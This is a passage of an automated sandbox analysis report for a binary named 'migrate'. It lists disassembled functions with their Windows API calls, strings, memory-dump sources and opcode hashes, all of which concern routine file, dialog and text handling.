                                                                                                                                                                                                    • Opcode Fuzzy Hash: 8ff140baa4cbc094dc15175770df1d01be86495db8283667c9347ed9aff32cca
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 5721AF3244024CAEDF25EEA4DD05FEE7BE8AF15308F144122F910961A2E372D698CB52
                                                                                                                                                                                                    Function 00120E46 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 63COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0011AC5A,00000008,?,00000000,?,0011D22D,?,00000000), ref: 00120E85
                                                                                                                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0011AC5A,00000008,?,00000000,?,0011D22D,?,00000000), ref: 00120E8F
                                                                                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0011AC5A,00000008,?,00000000,?,0011D22D,?,00000000), ref: 00120E9F
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    • Thread pool initialization failed., xrefs: 00120EB7
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                                                                                                                    • Opcode ID: 24b2e151921787020e40fc026782ca6ba498d6a4b5457b55043d4c2f1a2ecaf1
                                                                                                                                                                                                    • Instruction ID: c30d2b6c3a2fecbb967a98af56ba53ab1fac1551bf0bfcb6941332a51c59ddf3
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 24b2e151921787020e40fc026782ca6ba498d6a4b5457b55043d4c2f1a2ecaf1
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 711191B16047189FC3225F6AAC84AA7FBECEB69744F11492EF1DAC3201D7B159C08B60
                                                                                                                                                                                                    Function 0012B270 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 00111316: GetDlgItem.USER32(00000000,00003021), ref: 0011135A
                                                                                                                                                                                                      • Part of subcall function 00111316: SetWindowTextW.USER32(00000000,001435F4), ref: 00111370
                                                                                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0012B2BE
                                                                                                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,00000080), ref: 0012B2D6
                                                                                                                                                                                                    • SetDlgItemTextW.USER32(?,00000067,?), ref: 0012B304
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                                                                                                    • String ID: GETPASSWORD1
                                                                                                                                                                                                    • API String ID: 445417207-3292211884
                                                                                                                                                                                                    • Opcode ID: 88b82f51f7af6a7732bbc9b94e33b56d599d37827ee6d86198cd0546d11974ac
                                                                                                                                                                                                    • Instruction ID: eaab6fe12a3c692acc2f91c4c8ac32bee0383fa10119206c79e18c11e31cd8c5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 88b82f51f7af6a7732bbc9b94e33b56d599d37827ee6d86198cd0546d11974ac
                                                                                                                                                                                                    • Instruction Fuzzy Hash: BF11C432904228B7DB259E64AD89FFF777CFF59710F000420FA45B34C0D7A1AAA597A1
                                                                                                                                                                                                    Function 0012DCDD Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 46COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID:
                                                                                                                                                                                                    • String ID: RENAMEDLG$REPLACEFILEDLG
                                                                                                                                                                                                    • API String ID: 0-56093855
                                                                                                                                                                                                    • Opcode ID: 2eca00f77147115ee1651225e22be14cabbf15a6785d4a12ba800f8450e4423e
                                                                                                                                                                                                    • Instruction ID: 73fbd5fda4c89ec141019bcb3b091a3df1b25d96e8b70fed19c0b85449d8a25b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 2eca00f77147115ee1651225e22be14cabbf15a6785d4a12ba800f8450e4423e
                                                                                                                                                                                                    • Instruction Fuzzy Hash: DF019E3A604369EFC7118FA4FC44AAA3BA9F708355B000425F805A7AB0C73198E0EBE0
                                                                                                                                                                                                    Function 00139A1E Relevance: 6.3, APIs: 4, Instructions: 305COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __alldvrm$_strrchr
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1036877536-0
                                                                                                                                                                                                    • Opcode ID: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                                                                                                                    • Instruction ID: 6090f84384a51ec1b5287897d5424e1b9d478dabb6bb4dfa6c76e5e424199b4c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 3257cbe3c23a9893bcf4e13c0b157f0aff40f0c1a093e58d5470b9d1dc85e048
                                                                                                                                                                                                    • Instruction Fuzzy Hash: A0A13972A043869FEB25CF68C891BBEFBE5EF65310F1841ADE4859B281C3B99D41C750
                                                                                                                                                                                                    Function 0011A354 Relevance: 6.1, APIs: 4, Instructions: 127filetimeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,?,00000800,?,00117F69,?,?,?), ref: 0011A3FA
                                                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000003,00000000,00000003,02000000,00000000,?,?,00000800,?,?,00000800,?,00117F69,?), ref: 0011A43E
                                                                                                                                                                                                    • SetFileTime.KERNEL32(?,00000800,?,00000000,?,?,00000800,?,00117F69,?,?,?,?,?,?,?), ref: 0011A4BF
                                                                                                                                                                                                    • CloseHandle.KERNEL32(?,?,?,00000800,?,00117F69,?,?,?,?,?,?,?,?,?,?), ref: 0011A4C6
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Create$CloseHandleTime
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2287278272-0
                                                                                                                                                                                                    • Opcode ID: 1736c7af12d2f9229f305abece14f0fc0b2f7e8776e398c730758d10cd1248d2
                                                                                                                                                                                                    • Instruction ID: 6a21862c3200276e05554de25be80044ab588456f2f24c59a436dbbfc53080e7
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 1736c7af12d2f9229f305abece14f0fc0b2f7e8776e398c730758d10cd1248d2
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 9441E031249381AAD735DF24DC45FEEBBE4AF91300F48092DF6E093590D7A49A88DB53
                                                                                                                                                                                                    Function 00111100 Relevance: 6.1, APIs: 4, Instructions: 119COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 176396367-0
                                                                                                                                                                                                    • Opcode ID: 191c025d14339238d0a548fa162e477baba50e9c9fc8351224282f999866cf80
                                                                                                                                                                                                    • Instruction ID: fb6411843cdea6d79bd135c95e504b6fc9aad7a712268dae17300cb9c01b1ce4
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 191c025d14339238d0a548fa162e477baba50e9c9fc8351224282f999866cf80
                                                                                                                                                                                                    • Instruction Fuzzy Hash: C341C571900669ABCB25DF68CC099EFBBB8EF15310F100129FD55F7241DB30AE958BA4
                                                                                                                                                                                                    Function 0013C988 Relevance: 6.1, APIs: 4, Instructions: 110COMMONLIBRARYCODE
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000000,2DE85006,001347C6,00000000,00000000,001357FB,?,001357FB,?,00000001,001347C6,2DE85006,00000001,001357FB,001357FB), ref: 0013C9D5
                                                                                                                                                                                                    • MultiByteToWideChar.KERNEL32(?,00000001,?,?,00000000,?), ref: 0013CA5E
                                                                                                                                                                                                    • GetStringTypeW.KERNEL32(?,00000000,00000000,?), ref: 0013CA70
                                                                                                                                                                                                    • __freea.LIBCMT ref: 0013CA79
                                                                                                                                                                                                      • Part of subcall function 00138E06: RtlAllocateHeap.NTDLL(00000000,?,?,?,00134286,?,0000015D,?,?,?,?,00135762,000000FF,00000000,?,?), ref: 00138E38
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ByteCharMultiWide$AllocateHeapStringType__freea
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 2652629310-0
                                                                                                                                                                                                    • Opcode ID: b3b48aed1214935f0e8bb0931bb964a6102a1f0943938f83ba5c6626ad17a0a8
                                                                                                                                                                                                    • Instruction ID: 2466f3864e22b76468f7c54e7fc15f33fee9303ca98114584b9cf6a1b7ffefa5
                                                                                                                                                                                                    • Opcode Fuzzy Hash: b3b48aed1214935f0e8bb0931bb964a6102a1f0943938f83ba5c6626ad17a0a8
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8D31DE72A0021AABDF24CFA4DC41DAE7BA5EB01710F044228FC15E72A0EB35CD90CBE0
                                                                                                                                                                                                    Function 0012A663 Relevance: 6.0, APIs: 4, Instructions: 19COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • GetDC.USER32(00000000), ref: 0012A666
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,00000058), ref: 0012A675
                                                                                                                                                                                                    • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0012A683
                                                                                                                                                                                                    • ReleaseDC.USER32(00000000,00000000), ref: 0012A691
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: CapsDevice$Release
                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                    • API String ID: 1035833867-0
                                                                                                                                                                                                    • Opcode ID: 875ccd52fc01d9436b54b32cb72b461c206e4bed36121b5dbdc14a86a3ac5cf9
                                                                                                                                                                                                    • Instruction ID: bbd0ab5b82a12b8787e94cf9c67df9ed7b50934dffe3c960c8b7a1ae01ff616b
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 875ccd52fc01d9436b54b32cb72b461c206e4bed36121b5dbdc14a86a3ac5cf9
                                                                                                                                                                                                    • Instruction Fuzzy Hash: E7E0EC31942722E7D6615B60BC0DB8A3E64AB06B53F010101FA19AA590DB6486C09BA1
                                                                                                                                                                                                    Function 0012A80C Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 237COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                      • Part of subcall function 0012A699: GetDC.USER32(00000000), ref: 0012A69D
                                                                                                                                                                                                      • Part of subcall function 0012A699: GetDeviceCaps.GDI32(00000000,0000000C), ref: 0012A6A8
                                                                                                                                                                                                      • Part of subcall function 0012A699: ReleaseDC.USER32(00000000,00000000), ref: 0012A6B3
                                                                                                                                                                                                    • GetObjectW.GDI32(?,00000018,?), ref: 0012A83C
                                                                                                                                                                                                      • Part of subcall function 0012AAC9: GetDC.USER32(00000000), ref: 0012AAD2
                                                                                                                                                                                                      • Part of subcall function 0012AAC9: GetObjectW.GDI32(?,00000018,?), ref: 0012AB01
                                                                                                                                                                                                      • Part of subcall function 0012AAC9: ReleaseDC.USER32(00000000,?), ref: 0012AB99
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: ObjectRelease$CapsDevice
                                                                                                                                                                                                    • String ID: (
                                                                                                                                                                                                    • API String ID: 1061551593-3887548279
                                                                                                                                                                                                    • Opcode ID: bbe55977eda45c23e4278d7ee350d8f953a966065748cc5e0d8cc54a41ae5160
                                                                                                                                                                                                    • Instruction ID: 8d90a11080a9293165e23bfab3ea73b9bf8477becd206a8371866cc61a947b9c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bbe55977eda45c23e4278d7ee350d8f953a966065748cc5e0d8cc54a41ae5160
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 4491EE75608354AFD611DF25D844E2BBBF9FF89700F00491EF99AD3260DB70A986CB62
                                                                                                                                                                                                    Function 001175DE Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 137timeCOMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • __EH_prolog.LIBCMT ref: 001175E3
                                                                                                                                                                                                      • Part of subcall function 001205DA: _wcslen.LIBCMT ref: 001205E0
                                                                                                                                                                                                      • Part of subcall function 0011A56D: FindClose.KERNELBASE(00000000,000000FF,?,?), ref: 0011A598
                                                                                                                                                                                                    • SetFileTime.KERNEL32(?,?,?,?,?,00000005,?,00000011,?,?,00000000,?,0000003A,00000802), ref: 0011777F
                                                                                                                                                                                                      • Part of subcall function 0011A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0011A325,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A501
                                                                                                                                                                                                      • Part of subcall function 0011A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0011A325,?,?,?,0011A175,?,00000001,00000000,?,?), ref: 0011A532
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: File$Attributes$CloseFindH_prologTime_wcslen
                                                                                                                                                                                                    • String ID: :
                                                                                                                                                                                                    • API String ID: 3226429890-336475711
                                                                                                                                                                                                    • Opcode ID: bdd832e8cc6ea2a1687ab621112ae327d7fb37e83e9d252e467a386b191c1001
                                                                                                                                                                                                    • Instruction ID: e1fe734ab6ddbeded68db91abe21a7d66b904fc42ba40ac07a6575a228bf90ea
                                                                                                                                                                                                    • Opcode Fuzzy Hash: bdd832e8cc6ea2a1687ab621112ae327d7fb37e83e9d252e467a386b191c1001
                                                                                                                                                                                                    • Instruction Fuzzy Hash: F8419271805168A9EB29EB64DC59EEEB37DAF65300F0040A6B609A31D2DB745FC9CF70
                                                                                                                                                                                                    Function 0012B48E Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 77COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: _wcslen
                                                                                                                                                                                                    • String ID: }
                                                                                                                                                                                                    • API String ID: 176396367-4239843852
                                                                                                                                                                                                    • Opcode ID: 6b055d92c4c9bf1011c4ff159c2e9d17db73c8d5608ffc51f1a6b464e82c3e92
                                                                                                                                                                                                    • Instruction ID: 93570be3828072d9e135b58bc362f760ec5a5a5ffe3d79116cff1fb5c512843c
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 6b055d92c4c9bf1011c4ff159c2e9d17db73c8d5608ffc51f1a6b464e82c3e92
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 182108729093265AD731EB64F885F6FB3DCDF50760F04042AF640C7141E765DD6883A2
                                                                                                                                                                                                    Function 0011B991 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 62COMMON
                                                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                                                    APIs
                                                                                                                                                                                                    • _swprintf.LIBCMT ref: 0011B9B8
                                                                                                                                                                                                      • Part of subcall function 00114092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 001140A5
                                                                                                                                                                                                    Strings
                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                    • Source File: 0000001A.00000002.1867737796.0000000000111000.00000020.00000001.01000000.00000009.sdmp, Offset: 00110000, based on PE: true
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867722166.0000000000110000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867763975.0000000000143000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.000000000014E000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000155000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867782801.0000000000172000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    • Associated: 0000001A.00000002.1867848683.0000000000173000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                    • Snapshot File: hcaresult_26_2_110000_migrate.jbxd
                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                    • API ID: __vswprintf_c_l_swprintf
                                                                                                                                                                                                    • String ID: %c:\
                                                                                                                                                                                                    • API String ID: 1543624204-3142399695
                                                                                                                                                                                                    • Opcode ID: 261da06c808a7d1645da6ab70b25f813eaa43de7090e154315ae1ed51f8ca977
                                                                                                                                                                                                    • Instruction ID: 3cf1ef6c2778d2b86e34fd758afaf278fa4b5f5da2a7400553f05693e9d94f3d
                                                                                                                                                                                                    • Opcode Fuzzy Hash: 261da06c808a7d1645da6ab70b25f813eaa43de7090e154315ae1ed51f8ca977
                                                                                                                                                                                                    • Instruction Fuzzy Hash: 0301F56350831179DA386B759CC2DABA7ACEFA57B0B50442EF554D7082FB30D88182F1
